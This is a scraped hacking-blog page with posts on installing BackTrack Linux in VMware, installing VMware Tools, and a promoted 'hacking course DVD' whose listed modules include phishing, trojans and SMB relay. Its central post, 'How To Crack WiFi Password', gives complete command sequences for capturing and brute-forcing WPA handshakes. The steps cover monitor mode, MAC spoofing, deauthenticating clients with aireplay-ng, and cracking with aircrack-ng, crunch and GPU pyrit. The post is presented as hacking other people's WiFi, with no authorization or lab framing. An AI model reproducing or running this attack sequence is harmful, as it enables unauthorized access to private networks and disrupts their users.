Powered by Blogger.

Translate

Popular Posts

About

IP Address Checker
IP Address Checker

Blogger news

Blogroll

Search

Blogger templates

RSS
Showing posts with label BackTrack. Show all posts
Showing posts with label BackTrack. Show all posts

Installation of Backtrack - How To Install BackTrack





You can install backtrack 5 on your system in many ways. You can install it on your system as primary OS. You can also install it as virtual machine on your windows and you can also install it as dual with some other operating system as windows.
The best way as a learner is to use backtrack as a virtual machine on your system. In this way you can use it easily with your windows.




In this tutorial i will show you how to setup backtrack as a virtual machine on your system.


First of all download the backtrack5 from the website.DOWNLOAD


Then download VMware workstation.
DOWNLOAD

Install VMware workstation on your system and create a new Virtual machine.


select custom (advanced).

Choose the Virtual Machine Hardware Compatibility.

Click on Next for defaults.

Now select the installer disk image and browse the backtrack image.


Now it will ask the guest operating system. Select Linux, then choose Other Linux 2.6.x kernel as the version.

Give a name to your virtual machine

In memroy config, set the memory for your virtual machine. i will recommend 512 MB.

In network type choose NAT

Then Select SCSI adapter type and Choose LSI Logic

Set Maximum disk size.
I recommend you to select 10GB or above

Choose Store virutal disk as a single file.
Specify disk file and Just click next.



Now backtrack should be loading and booting


After loading type startex to go to GUI mode.


Now run install backtrack.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How To Crack WiFi Password By Backtrack 5



STEPS TO HACK WIFI OR WIRELESS PASSWORD



1. Get the Backtrack-Linux CD. Backtrack Linux Live CD(best Linux available for hackers with more than 2000 hacking tools inbuilt).

Download Backtrack Linux Live CD from here: CLICK HERE






Steps to Follow:
Step 1 :
airmon-ng

The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :
airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step 5 :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0


*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.
aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :ITS AN OPTIONAL STEP,,,,,,

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :
airmon-ng


The result will be something like :
Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :
airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :
airodump-ng mon0

Then, press "
Ctrl+c" to break the program.

Step e :
airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0


Step f :

open another terminal.
aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download 
crunch 3.0 (the current version at the time of this writing).http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download
tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.
http://code.google.com/p/pyrit/downloads/list

Download 
pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :
/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the 
wpacrack-01.cap, you should do the following step.pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 
8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.
Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com

This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

Download Free Backtrack Hacking Course DVD

                          
Download Free Backtrack Hacking Course DVD







Along With 45+ Modules
 1 Hacking Basics -MD5
 2 Website Hacking -Sql Injection
 3 Website Hacking -xss
 4 Staying Secure
 5 Modding Xbox Softmod
 6 Wireless Hacking - Cracking WPA
 7 Triple Boot
 9 Local Password Cracking
 10 Lockpicking Basics
 11 Ettercap
 12 Xss Tunnel
 13 Playstaion 2 Softmod
 14 cracking WEP update
 15 Bypass Hotspot's Acesss Controls
 16 Lockpicing DUmpkey
 17 Phone Phreaking -Begie Box
 18 Phone Phreaking -Snifing VOIP
 19 Lockpicking DIY Padlock
 20 Cracking WEP
 21 LOckingPicking Multi-Disc
 22 Network Hacking -Arp Poisoning
 23 wordpress Social Engineering
 24 Metasploit Autopwn
 25 Application Patching
 26 Windows SMB relay Exploit
 27 Password Phising
 28 CoMbine Files
 29 Manipulating Windows User account
 30 Torjan Basics
 31 Evilgrade
 32 Dwonfalls of Anti-Virus software
 33 Home Made Lock Pics
 34 Fix Google Mail Enumerator
 35 VMWARE
 36 Bluetooth Hacking
 37 Windows Privilage Escalation
 38 Local File Inclusion
 39 Alternate Data Streams
 40 CSRF
 41 INSTALL BACKTRACK ON USB
 42 Ardunio Arp Cop
 43 Beer Pong Table
 44 Bypass Cisco Clean Access & Cisco NAC Appiance
 45 DNS SPOOF virtual Hosts
 46 Deep Freeze
 47 Email Injecion
 48 Extracting Database Information
 49 Ping of Death

Download Here

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS

How to Install VMware Tools in Backtrack 5

How to install VMware tools in Backtrack 5



Many People face problem while installing VMware tool on
Backtrack 5 due to some simple commands order error on
VMware Console.
 VMware Tools is installed by default in GNOME Version so let

take a look to KDE Version

STEPS:
 On VMware On the Top of menu bar Go to  Virtual Machine 

then  InstallVMware Tools.
 


Now in this pic(above) see the commands order and follow them.

FOR BACKTRACK 5R2
 KDE Users, please run the following command before installing

VMWare tools on BackTrack5 R2:
 
root@bt:~# mkdir /etc/cups/ppd
 
root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom /mnt/cdrom
 
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz
/tmp/
 
root@bt:~# cd /tmp/
 
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz
 
root@bt:~# cd vmware-tools-distrib/
 
root@bt:~# ./vmware-install.pl

FOR BACKTRACK 5R1
 On Backtrack 5R1 you have to manually install the VMware

Tools  first  prepare your kernel source by issuing the following
commands:
 
root@bt:~# ln -s /usr/src/linux /lib/modules/2.6.39.4/build
 
root@bt:~# mkdir /etc/cups/ppd
 
root@bt:~# mkdir /mnt/cdrom; mount /dev/cdrom /mnt/cdrom
 
root@bt:~# cp /mnt/cdrom/VMwareTools-<version>.tar.gz
/tmp/
 
root@bt:~# cd /tmp/
 
root@bt:~# tar zxpf VMwareTools-<version>.tar.gz
 
root@bt:~# cd vmware-tools-distrib/
 
root@bt:~# ./vmware-install.pl
 


When it will asked that IF YOU WANT THE SCRIPT TO RUN
VMWARE-CONFIG-TOOLS.PL FOR YOU the type NO.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS